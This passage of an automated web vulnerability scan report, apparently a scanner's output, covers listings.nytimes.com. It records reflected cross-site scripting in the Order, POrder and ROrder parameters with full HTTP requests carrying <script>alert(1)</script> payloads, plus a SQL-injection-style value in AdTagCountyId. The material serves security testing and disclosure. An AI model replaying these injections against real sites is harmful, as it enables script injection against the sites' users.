POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A99438<script>alert(1)</script>f49b8802311&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A99438<script>alert(1)</script>f49b8802311&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1
...[SNIP]...

4.211. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Order parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Order request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 509cf"><script>alert(1)</script>348a14375d113d3ff was submitted in the Order parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A509cf"><script>alert(1)</script>348a14375d113d3ff&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91549
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=DHLKNADAODNBHMEKICNPHMHC; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="Order" value="A509cf"><script>alert(1)</script>348a14375d113d3ff">
...[SNIP]...

4.212. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [POrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the POrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac296"><script>alert(1)</script>db030ea9b21155262 was submitted in the POrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=Aac296"><script>alert(1)</script>db030ea9b21155262&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91509
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADQTTDT=FANHKJGABKMKIBLOABOKDGEK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="POrder" value="Aac296"><script>alert(1)</script>db030ea9b21155262">
...[SNIP]...

4.213. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [POrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the POrder request parameter is copied into the HTML document as plain text between tags. The payload fe2a2<script>alert(1)</script>72c92413638 was submitted in the POrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=Afe2a2<script>alert(1)</script>72c92413638&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=Afe2a2<script>alert(1)</script>72c92413638&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c
...[SNIP]...

4.214. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ROrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ROrder request parameter is copied into the HTML document as plain text between tags. The payload e3872<script>alert(1)</script>491f30c5094 was submitted in the ROrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=Ae3872<script>alert(1)</script>491f30c5094&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=Ae3872<script>alert(1)</script>491f30c5094&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N10
...[SNIP]...

4.215. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ROrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ROrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f9fa"><script>alert(1)</script>fbfd7560356c2d4d7 was submitted in the ROrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

